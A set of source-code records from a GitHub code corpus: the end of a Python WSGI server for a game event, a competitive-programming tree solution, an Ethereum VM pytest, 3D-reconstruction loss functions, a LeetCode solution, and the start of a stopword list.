environ.get('HTTP_X_FOOLSSESSIONTOKEN', '')\n if not auth.validate(uid, token):\n start_response(\n '401 Unauthorized',\n construct_headers(HEADERS_TEXT, HEADERS_CORS)\n )\n return [b'ERR_INVALID_TOKEN']\n\n try:\n data_len = int(environ.get('CONTENT_LENGTH', 0))\n data = base64.b64decode(environ['wsgi.input'].read(data_len))\n r = base64.b64encode(handlers.handle_packet(uid, data, False))\n except handlers.FoolsMapAccessDeniedError as ex:\n start_response(\n '401 Unauthorized',\n construct_headers(HEADERS_TEXT, HEADERS_CORS)\n )\n return [bytes(repr(ex), 'utf-8')]\n except handlers.FoolsDescriptiveProcessingError as ex:\n start_response(\n '422 Unprocessable Entity',\n construct_headers(HEADERS_TEXT, HEADERS_CORS)\n )\n return [bytes(repr(ex), 'utf-8')]\n except handlers.FoolsPacketHandlerError as ex:\n start_response(\n '422 Unprocessable Entity',\n construct_headers(HEADERS_TEXT, HEADERS_CORS)\n )\n return [bytes(\"FoolsPacketHandlerError('malformed packet')\", 'utf-8')]\n \n with datastore.open_user_datastore(uid) as d:\n udata = d.read()\n achievements.check_player_completion(udata)\n d.write(udata)\n\n start_response(\n '200 OK',\n construct_headers(HEADERS_TEXT, HEADERS_CORS, [\n (\"X-FoolsRefreshToken\", auth.create(uid)),\n (\"X-FoolsProtocolVersion\", str(config.PROTOCOL_VERSION))\n ])\n )\n return [r]\n \n@rt.route(\"^/turbopacket/[0-9]+/?$\", [\"POST\"])\ndef appTurboRequest(environ, start_response):\n ratelimiter.test(environ['REMOTE_ADDR'], 2)\n # only allow authorized requests\n uid = int(environ['PATH_INFO'].split('/')[-1])\n token = environ.get('HTTP_X_FOOLSSESSIONTOKEN', '')\n if not auth.validate(uid, token):\n start_response(\n '401 Unauthorized',\n construct_headers(HEADERS_TEXT, HEADERS_CORS)\n )\n return [b'ERR_INVALID_TOKEN']\n\n try:\n data_len = int(environ.get('CONTENT_LENGTH', 0))\n data = base64.b64decode(environ['wsgi.input'].read(data_len))\n r = base64.b64encode(handlers.handle_packet(uid, data, True))\n except handlers.FoolsMapAccessDeniedError as ex:\n start_response(\n '401 Unauthorized',\n construct_headers(HEADERS_TEXT, HEADERS_CORS)\n )\n return [bytes(repr(ex), 'utf-8')]\n except handlers.FoolsDescriptiveProcessingError as ex:\n start_response(\n '422 Unprocessable Entity',\n construct_headers(HEADERS_TEXT, HEADERS_CORS)\n )\n return [bytes(repr(ex), 'utf-8')]\n except handlers.FoolsPacketHandlerError as ex:\n start_response(\n '422 Unprocessable Entity',\n construct_headers(HEADERS_TEXT, HEADERS_CORS)\n )\n return [bytes(\"FoolsPacketHandlerError('malformed packet')\", 'utf-8')]\n\n with datastore.open_user_datastore(uid) as d:\n udata = d.read()\n achievements.check_player_completion(udata)\n d.write(udata)\n\n start_response(\n '200 OK',\n construct_headers(HEADERS_TEXT, HEADERS_CORS, [\n (\"X-FoolsRefreshToken\", auth.create(uid)),\n (\"X-FoolsProtocolVersion\", str(config.PROTOCOL_VERSION))\n ])\n )\n return [r]\n\n@rt.route(\"^/message\", [\"POST\"])\ndef appSetMessage(environ, start_response):\n ratelimiter.test(environ['REMOTE_ADDR'], 4)\n data_len = int(environ.get('CONTENT_LENGTH', 0))\n data = json.loads(environ['wsgi.input'].read(data_len))\n \n token = environ.get('HTTP_X_FOOLSSESSIONTOKEN', '')\n if not auth.validate(-1, token):\n start_response(\n '401 Unauthorized',\n construct_headers(HEADERS_JSON, HEADERS_CORS)\n )\n return util.json_error(20, \"Invalid or expired session token\")\n uid = auth.token_uid(token)\n \n if len(data['message']) > 150:\n start_response(\n '422 Unprocessable Entity',\n construct_headers(HEADERS_JSON, HEADERS_CORS)\n )\n return util.json_error(5, \"Your message is too long.\")\n\n with datastore.open_user_datastore(uid) as d:\n user_datastore = d.read()\n user_datastore['message'] = data['message']\n d.write(user_datastore)\n\n start_response(\n '200 OK',\n construct_headers(HEADERS_JSON, HEADERS_CORS)\n )\n return util.json_ok({})\n \n@rt.route(\"^/title\", [\"POST\"])\ndef appSetTitle(environ, start_response):\n ratelimiter.test(environ['REMOTE_ADDR'], 4)\n data_len = int(environ.get('CONTENT_LENGTH', 0))\n data = json.loads(environ['wsgi.input'].read(data_len))\n \n token = environ.get('HTTP_X_FOOLSSESSIONTOKEN', '')\n if not auth.validate(-1, token):\n start_response(\n '401 Unauthorized',\n construct_headers(HEADERS_JSON, HEADERS_CORS)\n )\n return util.json_error(20, \"Invalid or expired session token\")\n uid = auth.token_uid(token)\n\n with datastore.open_user_datastore(uid) as d:\n user_datastore = d.read()\n if data['title'] not in user_datastore['titles']:\n start_response(\n '422 Unprocessable Entity',\n construct_headers(HEADERS_JSON, HEADERS_CORS)\n )\n return util.json_error(5, \"This title was not unlocked yet\")\n user_datastore['title'] = data['title']\n achievements.update_leaderboard_record(user_datastore)\n d.write(user_datastore)\n\n start_response(\n '200 OK',\n construct_headers(HEADERS_JSON, HEADERS_CORS)\n )\n return util.json_ok({})\n\n@rt.route(\"^/wholesome\", [\"POST\"])\ndef appSetWholesome(environ, start_response):\n # This one was used to grant the Wholesome Reward in the original event,\n # but that's removed in unofficial releases, to avoid confusing users.\n \n # \"hello ZZAZZ this reward code does not work on this random server you\n # have zero control of, I paid you money for this, I demand a refund!!!\"\n \n start_response(\n '422 Unprocessable Entity',\n construct_headers(HEADERS_JSON, HEADERS_CORS)\n )\n return util.json_error(41, \"You can't become wholesome on this unofficial server\")\n\n@rt.route(\"^/automation\", [\"GET\"])\ndef appAutomationMessage(environ, start_response):\n ratelimiter.test(environ['REMOTE_ADDR'], 4)\n start_response(\n '200 OK',\n construct_headers(HEADERS_TEXT, HEADERS_CORS)\n )\n with open('automation.txt', 'rb') as f:\n contents = f.read()\n return [contents]\n\n@rt.route(\"^.*$\")\ndef appDefault(environ, start_response):\n start_response(\n '404 Bepis', \n construct_headers(HEADERS_HTML, HEADERS_CORS)\n )\n html = '''\n \n

\n Click here if your browser doesn't redirect you automatically.\n

\n '''\n return [bytes(html, 'utf-8')]\n\nif __name__ == \"__main__\":\n logger.log(TAG, \"Server started\")\n server = wsgiserver.WSGIServer(rt, host='127.0.0.1', port=6937)\n server.start()\n","repo_name":"zzazzdzz/fools2022","sub_path":"server/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":15700,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"6"} +{"seq_id":"40129044914","text":"# included from libs/graph_to_tree.py\ndef graph_to_tree(N, edges, root):\n from collections import defaultdict\n children = defaultdict(list)\n parents = [None] * N\n root = 0\n parents[root] = root\n stack = [root]\n while stack:\n v = stack.pop()\n for u in edges[v]:\n if parents[u] is not None:\n # already visited\n continue\n parents[u] = v\n children[v].append(u)\n stack.append(u)\n return children, parents\n\n# end of libs/graph_to_tree.py\n\n# included from snippets/main.py\n\n\ndef debug(*x, msg=\"\"):\n import sys\n print(msg, *x, file=sys.stderr)\n\n\ndef solve(SOLVE_PARAMS):\n pass\n\n\ndef main():\n from collections import defaultdict\n N = int(input())\n edges = defaultdict(list)\n AS = []\n BS = []\n for _i in range(N - 1):\n a, b = map(int, input().split())\n a -= 1\n b -= 1\n AS.append(a)\n BS.append(b)\n edges[a].append(b)\n edges[b].append(a)\n\n root = 0\n children, parents = graph_to_tree(N, edges, root)\n veterx_diff = [0] * N\n\n Q = int(input())\n for _q in range(Q):\n t, e, x = map(int, input().split())\n e -= 1\n a = AS[e]\n b = BS[e]\n if t == 1:\n if parents[a] == b:\n veterx_diff[a] += x\n else:\n veterx_diff[root] += x\n veterx_diff[b] -= x\n else:\n if parents[a] == b:\n veterx_diff[root] += x\n veterx_diff[a] -= x\n else:\n veterx_diff[b] += x\n\n finish = [0] * N\n\n stack = [(root, 0)]\n while stack:\n v, x = stack.pop()\n x += veterx_diff[v]\n finish[v] += x\n for c in children[v]:\n stack.append((c, x))\n\n print(*finish, sep=\"\\n\")\n\n\n# tests\nT1 = \"\"\"\n5\n1 2\n2 3\n2 4\n4 5\n4\n1 1 1\n1 4 10\n2 1 100\n2 2 1000\n\"\"\"\nTEST_T1 = \"\"\"\n>>> as_input(T1)\n>>> main()\n11\n110\n1110\n110\n100\n\"\"\"\n\nT2 = \"\"\"\n7\n2 1\n2 3\n4 2\n4 5\n6 1\n3 7\n7\n2 2 1\n1 3 2\n2 2 4\n1 6 8\n1 3 16\n2 4 32\n2 1 64\n\"\"\"\nTEST_T2 = \"\"\"\n>>> as_input(T2)\n>>> main()\n72\n8\n13\n26\n58\n72\n5\n\"\"\"\n\nT3 = \"\"\"\n11\n2 1\n1 3\n3 4\n5 2\n1 6\n1 7\n5 8\n3 9\n3 10\n11 4\n10\n2 6 688\n1 10 856\n1 8 680\n1 8 182\n2 2 452\n2 4 183\n2 6 518\n1 3 612\n2 6 339\n2 3 206\n\"\"\"\nTEST_T3 = \"\"\"\n>>> as_input(T3)\n>>> main()\n1657\n1657\n2109\n1703\n1474\n1657\n3202\n1474\n1247\n2109\n2559\n\"\"\"\n\n\ndef _test():\n import doctest\n doctest.testmod()\n g = globals()\n for k in sorted(g):\n if k.startswith(\"TEST_\"):\n print(k)\n doctest.run_docstring_examples(g[k], g, name=k)\n\n\ndef as_input(s):\n \"use in test, use given string as input file\"\n import io\n f = io.StringIO(s.strip())\n g = globals()\n g[\"input\"] = lambda: bytes(f.readline(), \"ascii\")\n g[\"read\"] = lambda: bytes(f.read(), \"ascii\")\n\n\nif __name__ == \"__main__\":\n import sys\n input = sys.stdin.buffer.readline\n read = sys.stdin.buffer.read\n sys.setrecursionlimit(10 ** 6)\n if sys.argv[-1] == \"-t\":\n print(\"testing\")\n _test()\n sys.exit()\n main()\n sys.exit()\n\n# end of snippets/main.py\n","repo_name":"nishio/atcoder","sub_path":"abc187/e.py","file_name":"e.py","file_ext":"py","file_size_in_byte":3114,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"7177322259","text":"import pytest\n\nfrom eth_bloom import (\n BloomFilter,\n)\n\nfrom eth.abc import (\n ReceiptBuilderAPI,\n TransactionBuilderAPI,\n)\nfrom eth.chains.mainnet import (\n MAINNET_VMS,\n)\nfrom eth.rlp.headers import (\n BlockHeader,\n)\n\n\n@pytest.fixture(scope=\"module\")\ndef genesis_header():\n return BlockHeader(\n difficulty=0,\n block_number=0,\n gas_limit=10000,\n )\n\n\n@pytest.mark.parametrize(\"vm_class\", MAINNET_VMS)\ndef test_vm_block_class_is_properly_configured(\n vm_class,\n genesis_header,\n):\n vm_block_instance = vm_class.get_block_class()(genesis_header)\n\n txn_builder = vm_block_instance.get_transaction_builder()\n assert txn_builder is not None\n assert issubclass(txn_builder, TransactionBuilderAPI)\n\n receipt_builder = vm_block_instance.get_receipt_builder()\n assert receipt_builder is not None\n assert issubclass(receipt_builder, ReceiptBuilderAPI)\n\n bloom_filter = vm_block_instance.bloom_filter\n assert bloom_filter is not None\n assert isinstance(bloom_filter, BloomFilter)\n\n assert vm_block_instance.number == genesis_header.block_number == 0\n assert vm_block_instance.hash == genesis_header.hash\n","repo_name":"ethereum/py-evm","sub_path":"tests/core/vm/test_vm_class_configurations.py","file_name":"test_vm_class_configurations.py","file_ext":"py","file_size_in_byte":1177,"program_lang":"python","lang":"en","doc_type":"code","stars":2109,"dataset":"github-code","pt":"6"} +{"seq_id":"26460164995","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport pickle\nimport scipy.misc\nimport numpy as np\nimport os.path as osp\n\nimport torch\nimport torch.nn as nn\nimport torchvision.utils as vutils\n\nfrom . import geom_utils\nfrom . import scops_utils\nfrom .smr import SoftRenderer\nfrom .nmr_pytorch import NeuralRenderer\nfrom .chamfer_python import distChamfer\nfrom ..utils import image as image_utils\n\nclass edge_regularization(nn.Module):\n def __init__(self, edges):\n super(edge_regularization,self).__init__()\n self.edges = edges.long()\n\n def forward(self, pred):\n \"\"\"\n :param pred: batch_size * num_points * 3\n :param edges: num_edges * 2\n :return:\n \"\"\"\n l2_loss = nn.MSELoss(reduction='mean')\n return l2_loss(pred[:, self.edges[:, 0]], pred[:, self.edges[:, 1]]) * pred.size(-1)\n\ndef neg_iou_loss(predict, target, avg = True):\n dims = tuple(range(predict.ndimension())[1:])\n intersect = (predict * target).sum(dims)\n union = (predict + target - predict * target).sum(dims) + 1e-6\n if(avg):\n return 1. - (intersect / union).sum() / intersect.nelement()\n else:\n return 1. - (intersect / union)\n\ndef texture_dt_loss(texture_flow, dist_transf, vis_rend=None, cams=None, verts=None, tex_pred=None):\n \"\"\"\n texture_flow: B x F x T x T x 2\n (In normalized coordinate [-1, 1])\n dist_transf: B x 1 x N x N\n\n Similar to geom_utils.sample_textures\n But instead of sampling image, it samples dt values.\n \"\"\"\n # Reshape into B x F x T*T x 2\n T = texture_flow.size(-2)\n F = texture_flow.size(1)\n flow_grid = texture_flow.view(-1, F, T * T, 2)\n # B x 1 x F x T*T\n dist_transf = torch.nn.functional.grid_sample(dist_transf, flow_grid)\n\n if vis_rend is not None:\n # Visualize the error!\n # B x 3 x F x T*T\n dts = dist_transf.repeat(1, 3, 1, 1)\n # B x 3 x F x T x T\n dts = dts.view(-1, 3, F, T, T)\n # B x F x T x T x 3\n dts = dts.permute(0, 2, 3, 4, 1)\n dts = dts.unsqueeze(4).repeat(1, 1, 1, 1, T, 1) / dts.max()\n\n from ..utils import bird_vis\n for i in range(dist_transf.size(0)):\n rend_dt = vis_rend(verts[i], cams[i], dts[i])\n rend_img = bird_vis.tensor2im(tex_pred[i].data)\n import matplotlib.pyplot as plt\n plt.ion()\n fig=plt.figure(1)\n plt.clf()\n ax = fig.add_subplot(121)\n ax.imshow(rend_dt)\n ax = fig.add_subplot(122)\n ax.imshow(rend_img)\n import ipdb; ipdb.set_trace()\n\n return dist_transf.mean()\n\n\ndef texture_loss(img_pred, img_gt, mask_gt):\n \"\"\"\n Input:\n img_pred, img_gt: B x 3 x H x W\n mask_pred, mask_gt: B x H x W\n \"\"\"\n mask_gt = mask_gt.unsqueeze(1)\n\n return torch.nn.L1Loss()(img_pred * mask_gt, img_gt * mask_gt)\n\ndef texture_loss_masks(img_pred, img_gt, mask_gt, mask_pred, avg=True):\n \"\"\"\n Input:\n img_pred, img_gt: B x 3 x H x W\n mask_pred, mask_gt: B x H x W\n \"\"\"\n mask_gt = mask_gt.unsqueeze(1)\n mask_pred = mask_pred.unsqueeze(1)\n if(avg):\n return torch.nn.L1Loss()(img_pred * mask_pred, img_gt * mask_gt)\n else:\n loss = torch.nn.L1Loss(reduction = 'none')(img_pred * mask_pred, img_gt * mask_gt)\n loss = torch.sum(loss, dim = (1, 2, 3)) / (loss.size(1) * loss.size(2) * loss.size(3))\n return loss\n\ndef deform_l2reg(V):\n \"\"\"\n l2 norm on V = B x N x 3\n \"\"\"\n V = V.view(-1, V.size(2))\n return torch.mean(torch.norm(V, p=2, dim=1))\n\ndef sym_reg(verts):\n return torch.mean(torch.abs(verts[:,:,1]))\n\nclass PerceptualTextureLoss(object):\n def __init__(self):\n from .perceptual_loss import PerceptualLoss\n self.perceptual_loss = PerceptualLoss()\n\n def __call__(self, img_pred, img_gt, mask_gt, mask_pred=None, avg = True):\n \"\"\"\n Input:\n img_pred, img_gt: B x 3 x H x W\n mask_pred, mask_gt: B x H x W\n \"\"\"\n mask_gt = mask_gt.unsqueeze(1)\n if(mask_pred is not None):\n mask_pred = mask_pred.unsqueeze(1)\n dist = self.perceptual_loss(img_pred * mask_pred, img_gt * mask_gt)\n else:\n dist = self.perceptual_loss(img_pred * mask_gt, img_gt * mask_gt)\n\n # Only use mask_gt..\n if(avg):\n return dist.mean()\n else:\n return dist\n\nclass TexCycle(nn.Module):\n def __init__(self, im_size = 256, nf = 1280, eps = 1e-12):\n super(TexCycle,self).__init__()\n\n def forward(self, flow, prob, aggr_info):\n \"\"\"\n INPUTS:\n - flow: learned texture flow (nb * nf * nr * nr * 2)\n - prob: affinity between image & mesh by renderer (nb * nf * 2)\n - aggr_info: provide information about visible faces.\n OUTPUTS:\n - texture cycle loss\n IDEA:\n - make averaged coords of projected face equals to predicted flow\n \"\"\"\n nb, nf, nr, _, _ = flow.size()\n\n flow_grid = flow.view(nb, nf, -1, 2)\n avg_flow = torch.mean(flow_grid, dim = 2)\n\n # mask: nb x nf x 2\n # only rows correspond to visible faces are set to 1\n mask = torch.zeros(avg_flow.size())\n for cnt in range(nb):\n fids = torch.unique(aggr_info[cnt]).long()\n mask[cnt, fids, :] = 1\n\n mask = mask.cuda()\n loss = torch.nn.MSELoss()(avg_flow * mask, prob * mask)\n # second term for visilization purpose\n return loss, avg_flow[0, 0:10, :]\n\ndef entropy_loss(A):\n \"\"\"\n Input is K x N\n Each column is a prob of vertices being the one for k-th keypoint.\n We want this to be sparse = low entropy.\n \"\"\"\n entropy = -torch.sum(A * torch.log(A), 1)\n # Return avg entropy over\n return torch.mean(entropy)\n\nclass CorrLossChamfer(nn.Module):\n def __init__(self, scops_path, image_size):\n super(CorrLossChamfer,self).__init__()\n head_vertices = np.load(osp.join(scops_path, \"vertices_idx/head_vertices.npy\"))\n self.head_vertices = torch.from_numpy(head_vertices).long()\n self.head_num = len(self.head_vertices)\n\n belly_vertices = np.load(osp.join(scops_path, \"vertices_idx/belly_vertices.npy\"))\n self.belly_vertices = torch.from_numpy(belly_vertices).long()\n self.belly_num = len(self.belly_vertices)\n\n neck_vertices = np.load(osp.join(scops_path, \"vertices_idx/neck_vertices.npy\"))\n self.neck_vertices = torch.from_numpy(neck_vertices).long()\n self.neck_num = len(self.neck_vertices)\n\n back_vertices = np.load(osp.join(scops_path, \"vertices_idx/back_vertices.npy\"))\n self.back_vertices = torch.from_numpy(back_vertices).long()\n self.back_num = len(self.back_vertices)\n\n self.renderer = SoftRenderer(image_size)\n self.weights = [1, 1, 0, 0]\n\n nums = [self.head_vertices.size(0)]\n nums.append(nums[0] + self.belly_vertices.size(0))\n nums.append(nums[1] + self.neck_vertices.size(0))\n nums.append(nums[2] + self.back_vertices.size(0))\n self.nums = nums\n\n\n def forward(self, head_points, belly_points, neck_points, back_points, verts, cams, avg = True):\n bs = head_points.size(0)\n\n # predicted vertices\n head_vert_coords = verts[:, self.head_vertices, :]\n belly_vert_coords = verts[:, self.belly_vertices, :]\n back_vert_coords = verts[:, self.back_vertices, :]\n neck_vert_coords = verts[:, self.neck_vertices, :]\n\n vert_coords = torch.cat((head_vert_coords, belly_vert_coords, neck_vert_coords, back_vert_coords), dim = 1)\n\n vert2d = self.renderer.project_points(vert_coords, cams)\n\n # Chamfer loss\n nums = self.nums\n head_cdist1, _, _, _ = distChamfer(vert2d[:, :nums[0], :], head_points)\n belly_cdist1, _, _, _ = distChamfer(vert2d[:, nums[0]:nums[1], :], belly_points)\n neck_cdist1, _, _, _ = distChamfer(vert2d[:, nums[1]:nums[2], :], neck_points)\n back_cdist1, _, _, _ = distChamfer(vert2d[:, nums[2]:nums[3], :], back_points)\n\n cdist = torch.cat((head_cdist1 * self.weights[0], belly_cdist1 * self.weights[1], neck_cdist1 * self.weights[2], back_cdist1 * self.weights[3]), dim = 1)\n loss = torch.mean(cdist, dim = 1)\n if(avg):\n return torch.mean(loss), vert2d\n else:\n return loss\n\nclass MultiMaskLoss(nn.Module):\n def __init__(self, image_size = 256, renderer_type = \"softmax\", num_hypo_cams = 8):\n super(MultiMaskLoss, self).__init__()\n self.renderer = SoftRenderer(image_size, renderer_type)\n self.num_hypo_cams = num_hypo_cams\n self.image_size = image_size\n\n def forward(self, vs, fs, cams_all_hypo, cam_probs, masks_gt):\n bs = vs.size(0)\n # prepare vertices, faces, cameras\n pred_vs = vs.unsqueeze(1).repeat(1, self.num_hypo_cams, 1, 1).view(-1, vs.size(1), 3)\n faces = fs.unsqueeze(1).repeat(1, self.num_hypo_cams, 1, 1).view(-1, fs.size(1), 3)\n cams_all_hypo_flat = cams_all_hypo.view(-1, 7)\n\n # prepare images\n pred, _, _ = self.renderer.forward(pred_vs, faces, cams_all_hypo_flat)\n mask_all_hypo = pred[:, 3, :, :]\n masks = masks_gt.unsqueeze(1).repeat(1, self.num_hypo_cams, 1, 1).view(-1, self.image_size, self.image_size)\n\n # calculate loss\n loss = neg_iou_loss(mask_all_hypo, masks, avg = False)\n loss = loss.view(bs, -1) * cam_probs\n loss = loss.sum(dim = 1)\n mask_loss = loss.mean()\n\n return mask_loss, mask_all_hypo\n\nclass MultiTextureLoss(nn.Module):\n def __init__(self, samples_per_gpu = 32, num_hypo_cams = 8,\n image_size = 256, renderer_type = \"softmax\", texture_loss_type=\"perceptual\",\n renderer = \"smr\"):\n super(MultiTextureLoss, self).__init__()\n if(renderer in \"smr\"):\n self.renderer = SoftRenderer(image_size, renderer_type)\n else:\n self.renderer = NeuralRenderer(image_size)\n self.renderer.ambient_light_only()\n self.hard_renderer = SoftRenderer(image_size, \"hard\")\n\n if(texture_loss_type in \"perceptual\"):\n self.texture_loss = PerceptualTextureLoss()\n else:\n self.texture_loss = texture_loss_masks\n self.texture_cycle_fn = TexCycle(samples_per_gpu)\n\n self.num_hypo_cams = num_hypo_cams\n self.image_size = image_size\n self.which_renderer = renderer\n\n\n def forward(self, vs, fs, cams_all_hypo, cam_probs, proj_cam, rgbs, masks_gt, masks_pred, tx, tex_flow, dts_barrier):\n bs = vs.size(0)\n # prepare vertices, faces, textures and cameras\n pred_vs = vs.unsqueeze(1).repeat(1, self.num_hypo_cams, 1, 1).view(-1, vs.size(1), 3)\n faces = fs.unsqueeze(1).repeat(1, self.num_hypo_cams, 1, 1).view(-1, fs.size(1), 3)\n tex = tx.unsqueeze(1).repeat(1, self.num_hypo_cams, 1, 1, 1).view(-1, tx.size(1), tx.size(2), 3)\n cams_all_hypo_flat = cams_all_hypo.view(-1, 7)\n\n # prepare images: rendering and GT\n if(self.which_renderer in \"nmr\"):\n tex = tex.view(tex.size(0), tex.size(1), 6, 6, 3).unsqueeze(2).repeat(1, 1, 6, 1, 1, 1)\n texture_rgba = self.renderer.forward(pred_vs.detach(), faces, cams_all_hypo_flat, tex)\n else:\n texture_rgba, _, _ = self.renderer.forward(pred_vs.detach(), faces, cams_all_hypo_flat, tex)\n texture_pred = texture_rgba[:,0:3,:,:]\n imgs = rgbs.unsqueeze(1).repeat(1, self.num_hypo_cams, 1, 1, 1).view(-1, 3, self.image_size, self.image_size)\n masks_gt = masks_gt.unsqueeze(1).repeat(1, self.num_hypo_cams, 1, 1).view(-1, self.image_size, self.image_size)\n\n # calculate perceptual loss\n tex_loss = self.texture_loss(texture_pred, imgs, masks_gt, masks_pred, avg = False)\n tex_loss = tex_loss.view(bs, -1)\n tex_loss = tex_loss.to(cam_probs.get_device())\n tex_loss = (tex_loss * cam_probs).sum(dim = 1)\n tex_loss = tex_loss.mean()\n tex_dt_loss = texture_dt_loss(tex_flow, dts_barrier)\n\n # get the visiblility map\n _, p2f_info, aggr_info = self.hard_renderer(vs.detach(), fs, proj_cam.detach())\n aggr_info = aggr_info[:, 1, :, :].view(bs, -1)\n tex_cycle_loss, avg_flow = self.texture_cycle_fn(tex_flow, p2f_info.detach(), aggr_info.detach())\n\n return tex_loss, tex_dt_loss, tex_cycle_loss, texture_pred\n\nclass part_matching_loss(nn.Module):\n def __init__(self, scops_path, uv_sampler, num_sym_faces,\n im_size = 256, batch_size = 32,\n loss_type = 'mse', tex_size=6,\n num_cam = 1):\n super(part_matching_loss, self).__init__()\n\n # load mean semantic uv map\n uv_img = scipy.misc.imread(osp.join(scops_path, \"semantic_seg.png\"))\n uv_img = torch.from_numpy(uv_img).view(1, 1, 128, 256).float()\n uv_img = uv_img.cuda()\n\n tex = torch.nn.functional.grid_sample(uv_img, uv_sampler)\n tex = tex.view(tex.size(0), -1, tex.size(2), tex_size, tex_size).permute(0, 2, 3, 4, 1)\n tex_left = tex[:, -num_sym_faces:]\n tex = torch.cat([tex, tex_left], 1)\n tex = tex.view(tex.size(0), tex.size(1), -1, 1).squeeze()\n stex = torch.round(tex)\n\n # to one-hot\n nf, nt = stex.size()\n one_hot = torch.zeros(nf * nt, 5).cuda()\n one_hot.scatter_(1, stex.view(-1, 1).long(), 1)\n stex_one_hot = one_hot.view(1, nf, nt, 5)\n\n # semantic texture for each part, because the renderer can only render\n # 3-channel images, so we renderer each part separately\n self.register_buffer(\"stex1\", stex_one_hot[:, :, :, 1].unsqueeze(-1).repeat(batch_size * num_cam, 1, 1, 3))\n self.register_buffer(\"stex2\", stex_one_hot[:, :, :, 2].unsqueeze(-1).repeat(batch_size * num_cam, 1, 1, 3))\n self.register_buffer(\"stex3\", stex_one_hot[:, :, :, 3].unsqueeze(-1).repeat(batch_size * num_cam, 1, 1, 3))\n self.register_buffer(\"stex4\", stex_one_hot[:, :, :, 4].unsqueeze(-1).repeat(batch_size * num_cam, 1, 1, 3))\n\n self.renderer = SoftRenderer(im_size, \"softmax\")\n self.renderer.ambient_light_only()\n self.kl = nn.KLDivLoss(reduction='batchmean')\n\n # default value for backgrounds\n self.register_buffer(\"proj\", torch.zeros(batch_size * num_cam, 1, 256, 256))\n self.proj[:, 0, :, :] = 0.1\n\n # weights for each parts\n weights = torch.Tensor([0, 5.0, 0.0, 0.0, 5.0]).view(1, 5, 1, 1).cuda()\n self.register_buffer(\"weights\", weights)\n\n self.loss_type = loss_type\n\n def forward(self, verts, faces, cams, part_segs, cam_probs = None, avg = True):\n total_loss = 0\n projs = []\n bs = verts.size(0)\n\n # project each part\n proj1, _, _ = self.renderer(verts, faces, cams, self.stex1[:bs])\n proj1 = torch.mean(proj1[:, 0:3, :, :], dim = 1).unsqueeze(1)\n projs.append(proj1)\n\n proj2, _, _ = self.renderer(verts, faces, cams, self.stex2[:bs])\n proj2 = torch.mean(proj2[:, 0:3, :, :], dim = 1).unsqueeze(1)\n projs.append(proj2)\n\n proj3, _, _ = self.renderer(verts, faces, cams, self.stex3[:bs])\n proj3 = torch.mean(proj3[:, 0:3, :, :], dim = 1).unsqueeze(1)\n projs.append(proj3)\n\n proj4, _, _ = self.renderer(verts, faces, cams, self.stex4[:bs])\n proj4 = torch.mean(proj4[:, 0:3, :, :], dim = 1).unsqueeze(1)\n projs.append(proj4)\n\n proj = torch.cat((self.proj[:bs].detach(), proj1, proj2, proj3, proj4), dim = 1)\n centers_proj = scops_utils.batch_get_centers(nn.Softmax(dim = 1)(proj)[:, 1:, :, :])\n centers_parts = scops_utils.batch_get_centers(nn.Softmax(dim = 1)(part_segs)[:, 1:, :, :])\n\n if(avg):\n loss_lmeqv = torch.nn.functional.mse_loss(centers_proj, centers_parts)\n else:\n loss_lmeqv = torch.nn.functional.mse_loss(centers_proj, centers_parts, reduction = 'none')\n loss_lmeqv = torch.sum(loss_lmeqv, dim = (1, 2)) / (loss_lmeqv.size(1) * loss_lmeqv.size(2))\n loss_lmeqv = loss_lmeqv.view(cam_probs.size())\n loss_lmeqv = loss_lmeqv.to(cam_probs.get_device())\n loss_lmeqv = (loss_lmeqv * cam_probs).sum(dim = 1)\n loss_lmeqv = loss_lmeqv.mean()\n\n if(self.loss_type in 'kld'):\n loss_eqv = self.kl(torch.nn.functional.log_softmax(proj, dim = 1), torch.nn.functional.softmax(part_segs, dim = 1))\n else:\n # normalize each part\n # if scale is really small, the division might cause Nan.\n max_proj, _ = torch.max(proj.view(bs, 5, -1), dim = 2)\n max_proj[max_proj < 1e-5] = 1e-5\n proj_norm = proj / max_proj.view(bs, 5, 1, 1)\n\n max_part, _ = torch.max(part_segs.view(bs, 5, -1), dim = 2)\n max_part[max_part < 1e-5] = 1e-5\n part_norm = part_segs / max_part.view(bs, 5, 1, 1)\n\n if(avg):\n loss_eqv = torch.mean(nn.MSELoss(reduction='none')(proj_norm, part_norm) * self.weights)\n else:\n bs, cs, iis, iis = part_norm.size()\n loss_eqv = nn.MSELoss(reduction='none')(proj_norm, part_norm) * self.weights\n loss_eqv = torch.sum(loss_eqv, dim = (1, 2, 3)) / (cs * iis * iis)\n loss_eqv = loss_eqv.view(cam_probs.size())\n loss_eqv = loss_eqv.to(cam_probs.get_device())\n loss_eqv = (loss_eqv * cam_probs).sum(dim = 1)\n loss_eqv = loss_eqv.mean()\n\n total_loss = loss_eqv + loss_lmeqv\n return total_loss / 4.0, projs\n","repo_name":"NVlabs/UMR","sub_path":"nnutils/loss_utils.py","file_name":"loss_utils.py","file_ext":"py","file_size_in_byte":17689,"program_lang":"python","lang":"en","doc_type":"code","stars":223,"dataset":"github-code","pt":"6"} +{"seq_id":"5454689411","text":"\"\"\"\nProblem:\n 1528. Shuffle String\nDifficulty:\n Easy\nURL:\n https://leetcode.com/problems/shuffle-string\nTags:\n Array, String\nDate:\n 2022-05-10T14:11:39.888884+08:00\n\"\"\"\nfrom typing import List\n\n\nclass Solution:\n def restoreString(self, s: str, indices: List[int]) -> str:\n ans = ''\n for i, element in enumerate(indices):\n ans += s[indices.index(i)]\n return ans\n\n\ntests = [\n (\n (\"codeleet\", [4, 5, 6, 7, 0, 2, 1, 3],\n ),\n \"leetcode\",\n ),\n (\n (\"abc\", [0, 1, 2],\n ),\n \"abc\",\n ),\n]\n","repo_name":"s0u0b/leetcode","sub_path":"solutions/a01528_shuffle_string.py","file_name":"a01528_shuffle_string.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"7078045230","text":"# CleanText.py\n\nimport collections\nimport re\n\nfrom nltk.corpus import stopwords \nfrom nltk.tokenize import word_tokenize \nfrom itertools import tee\n\nimport Category\n\nstopwords = ['','a', 'about', 'above', 'across', 'after', 'afterwards']\nstopwords += ['again', 'against', 'all', 'almost', 'alone', 'along']\nstopwords += ['already', 'also', 